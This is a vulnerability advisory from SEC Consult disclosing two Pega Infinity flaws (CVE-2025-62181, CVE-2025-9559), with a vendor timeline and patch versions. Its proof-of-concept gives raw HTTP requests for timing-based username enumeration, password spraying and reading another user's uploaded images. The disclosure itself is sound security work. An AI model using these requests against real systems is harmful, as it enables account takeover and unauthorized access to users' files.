📄 PEGA Infinity Brute Force / Insecure Direct Object Reference

SEC Consult Vulnerability Lab Security Advisory < 20260317-0 >
    =======================================================================
                  title: Multiple vulnerabilities
                product: PEGA Infinity platform
     vulnerable version: CVE-2025-62181: Pega Platform versions 7.1.0 through Infinity 25.1.0
                         CVE-2025-9559: Pega Platform versions 8.7.5 to Infinity 24.2.2
          fixed version: CVE-2025-62181: 24.1.4, 24.2.4, and 25.1.1 patch
                         CVE-2025-9559:  24.2.3
             CVE number: CVE-2025-62181, CVE-2025-9559
                 impact: medium
               homepage:https://www.pega.com/
                  found: 2024-12-12
                     by: Eric Kahlert
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Atos business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "We are Pega- The enterprise transformation company.™
    Our enterprise AI decisioning and workflow automation platform delivers business
    transforming value. Together, we partner with the world’s largest organizations
    to Build for Change®."
    
    Source:https://www.pega.com/about
    
    
    Business recommendation:
    ------------------------
    The vendor provides a patch which should be installed immediately.
    
    SEC Consult highly recommends to perform a thorough security review of the product
    conducted by security professionals to identify and resolve potential further
    security issues.
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Weak Brute-Force protection for login page (CVE-2025-62181)
    The application's login form implements a weak login brute-force protection
    mechanism, which is only effective against multiple login attempts using
    different passwords. Attacks using the same password on different users and
    username enumeration are therefore not prevented.
    
    An attacker can perform the following attacks:
    - Username Enumeration: An attacker can test a large list of potential usernames
      against the login mechanism and distinguish between valid and invalid usernames
      based on the server's response time.
    - Password Spraying: In a password spraying attack, the same password is tested
      against many different usernames, potentially granting unauthorized access to user
      accounts in the worst-case scenario. To exploit this vulnerability, an attacker
      could, for example, create a script that uses the most common passwords and a list
      of known valid usernames to attempt authentication.
    
    2) Insecure Direct Object Reference (IDOR) (CVE-2025-9559)
    An Insecure Direct Object Reference (IDOR) occurs when an application grants direct
    access to objects based on user input without performing sufficient authorization
    checks. As a result, attackers can bypass authorization and directly access system
    resources, such as files. In this case the IDOR vulnerability can be used to read
    image files from other users without setting the option to share the images with
    others.
    
    
    Proof of concept:
    -----------------
    1) Weak Brute-Force protection for login page (CVE-2025-62181)
    This is an invalid login request:
    POST /XXX/app/default/CHhSc-bWE3BYCBUOUq46CjlmQt_t3VKg*/!STANDARD HTTP/1.1
    Host: [...]
    Cookie: Pega-RULES=[...]; JSESSIONID=[...]; ROUTEID=[...]
    [...]
    
    pzAuth=guest&UserIdentifier=PentestBenutzer_1&Password=invalid_password&pyActivity%3DCode-Security.Login=&lockScreenID=&lockScreenPassword=&newPassword=&confirmNewPassword=
    
    The server response for a valid username shows a significantly higher response
    time compared to responses with invalid usernames. An attacker can use a large
    list of potential usernames in a script to enumerate valid usernames, as illustrated
    in the following example, see figure <responseTimeTable.png>
    
    In less than a minute, 8,000 invalid authentication attempts were made from the same
    IP address using different usernames and the same password.
    
    Password Spraying:
    After enumerating valid usernames, an attacker can execute a password spraying attack by
    using the same request method as for username enumeration. A script is used to test the
    same password across many different usernames without triggering the brute-force protection.
    During this attack, 8,000 invalid authentication attempts were again made from the same
    IP address in under a minute, using different usernames and the same password.
    The attacker would repeat this attack with a list of valid usernames and common passwords
    until a successful login is found.
    
    As shown in the following example, the attack was successful with the username PentestBenutzer_1.
    See figure <passwordSpray.png>
    
    
    2) Insecure Direct Object Reference (IDOR) (CVE-2025-9559)
    In order to verify this vulnerability, e.g. a test user "user_1" is logged in:
    POST /XXX/app/default/CHhSc-bWE3BYCBUOUq46CjlmQt_t3VKg*/!STANDARD HTTP/1.1
    Host: [...]
    Cookie: p_unknown=true%7Bapp%7D; Pega-RULES[...]; JSESSIONID=[...]; ROUTEID=[...]
    [...]
    
    pzAuth=guest&UserIdentifier=user_1&Password=[...]&pyActivity%3DCode-Security.Login=&lockScreenID=&lockScreenPassword=&newPassword=&confirmNewPassword=
    
    The user receives the following Pega-RULES session cookie:
    
    HTTP/1.1 303 See Other
    Date: Thu, 12 Dec 2024 13:36:53 GMT
    [...]
    SET-COOKIE: Pega-RULES=%09%7Bpd%7DAAAABr3F5Rfo8PLlkIsDNLwSbSZ0HFLGwnS6[...]; Path=[...]; Secure; HttpOnly; SameSite=Lax;
    X-Content-Type-Options: nosniff
    Connection: close
    
    Another user "user_2" uploads an image, which is a two step process:
    POST 
    /XXX/app/XXX/bJXRcBOqwaiAstqd8LVSHIEMFNxpnKrvbr_zZRJ5OsQ*/!DCSPA_UserPortal?pyActivity=ReloadSection&pzTransactionId=b1f46a71d9635ab261358a8a4a9cbfdb&pzFromFrame=pyWorkPage&pzPrimaryPageName=pyWorkPage&pzKeepPageMessages=false&strPHarnessClass=XXX&strPHarnessPurpose=Review&UITemplatingStatus=Y&StreamName=pzBrowseDocument&BaseReference=pyAttachmentPage&StreamClass=Rule-HTML-Section&bClientValidation=true&FormError=NONE&pyCustomError=pyCaseErrorSection&PreActivity=pzUploadFileToADocument&HeaderButtonSectionName=-1&PagesToRemove=&pzHarnessID=HIDAA6704B0D23A3D2ABE9B1450BC6F31C4&inStandardsMode=true&AJAXTrackID=1&PreDataTransform=
     HTTP/1.1
    Host: [...]
    Cookie: Pega-Perf=itkn=5; Pega-RULES[...]; JSESSIONID=p_MM8f2VfKMT5sKhvtIc5_tNIt_foyBkqcpUIVW0.[...]; ROUTEID=[...]
    Content-Length: 32973
    [...]
    ------WebKitFormBoundaryTll7wmP4P42lbosV
    Content-Disposition: form-data; name="$PpyAttachmentPage$ppxAttachName"; filename="cat.png"
    Content-Type: image/png
    
    PNG
    [...]
    
    
    The upload is finalized with a second HTTP POST request:
    POST 
    /XXX/app/XXX/bJXRcBOqwaiAstqd8LVSHIEMFNxpnKrvbr_zZRJ5OsQ*/!DCSPA_UserPortal?pzTransactionId=b1f46a71d9635ab261358a8a4a9cbfdb&pzFromFrame=pyWorkPage&pzPrimaryPageName=pyWorkPage&AJAXTrackID=1
     HTTP/1.1
    Host: [...]
    Cookie: Pega-Perf=itkn=7&start; Pega-RULES=[...]; JSESSIONID=p_MM8f2VfKMT5sKhvtIc5_tNIt_foyBkqcpUIVW0.[...]; 
    ROUTEID=[...]
    Content-Length: 2655
    [...]
    
    pyActivity=SubmitModalFlowAction&EXPANDEDLGLayoutGrouppyEnterCaseDetailsS1=2&LGTypeLGLayoutGrouppyEnterCaseDetailsS1=tab&appendUniqueIdToFileName=true&$PpyAttachmentPage$ppxAttachName=&$PAddRecentContent$ppyLabel=cat&$PAddRecentContent$ppyDocumentAccessibleTo=Context&$PAddRecentContent$ppyDocumentContextLabel=XXX&$PAddRecentContent$ppyTopCaseID=FE-1001&$PAddRecentContent$ppyCaseContext=XXX&$PAddRecentContent$ppyClassContext=XXX&$PAddRecentContent$ppyContextType=Case&$PAddRecentContent$ppyContent=&$PAddRecentContent$ppyDescription=&$OCompositeGadget=&$OControlMenu=&$ODesktopWrapperInclude=&$ODeterminePortalTop=&$ODeveloperAssistant=&$ODynamicContainerFrameLess=&$ODynamicLayout=&$ODynamicLayoutCell=&$OEvalDOMScripts_Include=&$OForm=&$OGapIdentifier=&$OHarness=&$OHarnessStaticJSEnd=&$OHarnessStaticJSStart=&$OHarnessStaticScriptsClientValidation=&$OHarnessStaticScriptsExprCal=&$OLaunchFlow=&$OMenuBar=&$OMenuBarOld=&$OMicroDynamicContainer=&$OMobileAppNotify=&$OOperatorPresenceStatusScripts=&$OPMCPortalStaticScripts=&$ORepeatingDynamicLayout=&$ORepeatingGrid=&$OSessionUser=&$OSurveyStaticScripts=&$OWorkformStyles=&$Ocosmoslocale=&$OmenubarInclude=&$OpxButton=&$OpxDisplayText=&$OpxDropdown=&$OpxDynamicContainer=&$OpxGrid=&$OpxGridBody=&$OpxGridDataCell=&$OpxGridDataRow=&$OpxGridHeaderCell=&$OpxGridHeaderRow=&$OpxHarnessContent=&$OpxHidden=&$OpxIcon=&$OpxLayoutContainer=&$OpxLayoutHeader=&$OpxLink=&$OpxMenu=&$OpxMicroDynamicContainer=&$OpxNonTemplate=&$OpxSection=&$OpxTextInput=&$OpxVisible=&$OpxWorkArea=&$OpxWorkAreaContent=&$OpxWorkAreaHeader=&$OpyDirtyCheckConfirm=&$OpyWorkFormStandardEnd=&$OpyWorkFormStandardStart=&$Opycosmoscustomstyles=&$OpzAppLauncher=&$OpzDecimalInclude=&$OpzFrameLessDCScripts=&$OpzHarnessInlineScriptsEnd=&$OpzHarnessInlineScriptsStart=&$OpzMicroDynamicContainerScripts=&$OpzPegaCompositeGadgetScripts=&$OpzRuntimeToolsBar=&$Opzpega_ui_harnesscontext=&$Ordlincludes=&$OxmlDocumentInclude=&$OLGBundle=&$OLayoutGroup=&$OPegaSocial=&$OpxHeaderCell=&$OpxTextArea=&$Opycosmoscustomscripts=&$Opzcosmosuiscripts=&$Opzpega_control_attachcontent=&$OAttachmentActions=&$OAttachmentInlineView=&$OExternalViewerJS=&$OContainerDynamicLayoutGroup=&$ODynamicLayoutGroup=&$Olayoutgroupincludes=&$OpxAutoComplete=&$OpxRadioButtons=&$OpzAutoCompleteAGIncludes=&$OpzCKEditorScripts=&actionName=pzManageRecentContent&KeepMessages=false&FormError=NONE&pyCustomError=pyCaseErrorSection&modalSection=pyFlexModalTemplate&bIsOverlay=false&InterestPage=pyWorkPage&HarnessType=NEW&UITemplatingStatus=Y&pzHarnessID=HIDAA6704B0D23A3D2ABE9B1450BC6F31C4&inStandardsMode=true
    
    
    Now user_1 requests the image uploaded by user_2:
    GET /XXX/app/XXX/datacontent/image/DOCUMENT/DOC-1008.png HTTP/1.1
    Host: [...]
    Cookie: Pega-RULES=%09%7Bpd%7DAAAABr3F5Rfo8PLlkIsDNLwSbSZ0HFLGwnS6[...]; 
    JSESSIONID=cp7pHh8XQZvwMBc-vQ9JtZFJ5c4BEzYhWFLdcM0A.[...]; ROUTEID=[...]
    Connection: close
    
    
    The server responds with the requested image:
    
    HTTP/1.1 200 OK
    Date: Thu, 12 Dec 2024 14:01:39 GMT
    [...]
    
    ‰PNG
    [...]
    
    User_1 can read all uploaded images of user_2 by guessing the filenames and
    accessing them directly.
    
    
    Vulnerable / tested versions:
    -----------------------------
    According to the vendor, the following versions are vulnerable:
    CVE-2025-62181: Pega Platform versions 7.1.0 through Infinity 25.1.0
    CVE-2025-9559: Pega Platform versions 8.7.5 to Infinity 24.2.2
    
    
    Vendor contact timeline:
    ------------------------
    2025-01-14: Contacting vendor throughSecurityReport () Pega com; CSOC responds.
    2025-01-16: Sending advisory toIncidentResponse () pega com
    2025-02-04: Asking for a status update regarding the internal analysis.
    2025-02-05: Vendor received submission
    2025-02-21: Vendor requested additional information
    2025-03-03: Additional information sent to vendor
    2025-03-18: Asking for a status update.
    2025-04-15: Contacted vendor again, set deadline until end of April.
    2025-04-17: Vendor excuses delayed response, will provide further info on 18th.
    2025-04-18: Vendor provides status update regarding the two issues.
    2025-04-22: Vendor provides further status update
    2025-04-23: Sending additional details to the vendor regarding brute-force
                detection.
    2025-04-24: Vendor acknowledges some defects, others are still reviewed.
    2025-04-29: Additional information sent to vendor
    2025-05-01: Vendor is still reviewing user enumeration, ETA for IDOR should
                follow by the end of the week.
    2025-05-03: Vendor requested more time.
    2025-05-06: Asking vendor when the vulnerabilities will be fixed
    2025-05-08: Vendor will send timeframe on 12 May.
    2025-05-14: Vendor is targeting a solution to be available in v25.1.1 (Sept. '25)
                for user enumeration, IDOR follows the patch schedule (23.1.5, 24.1.4, 24.2.3, 25.1.0)
                herehttps://support.pega.com/pega-infinity-patch-calendar
    2025-05-15: Confirmed the vendor that we are willing to wait until September.
    2025-08-26: Contacted the vendor if the timeframe is still valid.
    2025-08-27: Vendor wants to postpone advisory release to 10/16/2025 (30 days after
                September release) and User Enum to first part of December 2025.
    2025-09-17: Vendor asks for more time regarding IDOR publication, patch is still
                scheduled for 16th October.
    2025-10-16: Vendor publishedhttps://www.cve.org/CVERecord?id=CVE-2025-9559
    2025-12-11: Vendor publishedhttps://www.cve.org/CVERecord?id=CVE-2025-62181
    2026-03-17: Public release of advisory.
    
    
    Solution:
    ---------
    The vendor provides a patch which should be installed immediately:
    CVE-2025-62181: 24.1.4, 24.2.4, and 25.1.1 patch
    CVE-2025-9559: 24.2.3
    
    Further information can also be found in the vendor's security advisory:
    https://support.pega.com/support-doc/pega-security-advisory-h25-vulnerability-remediation-note
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Atos business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Atos business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your applicationhttps://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local officeshttps://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web:https://www.sec-consult.com
    Blog:https://blog.sec-consult.com
    X:https://x.com/sec_consult
    
    EOF Eric Kahlert / @2026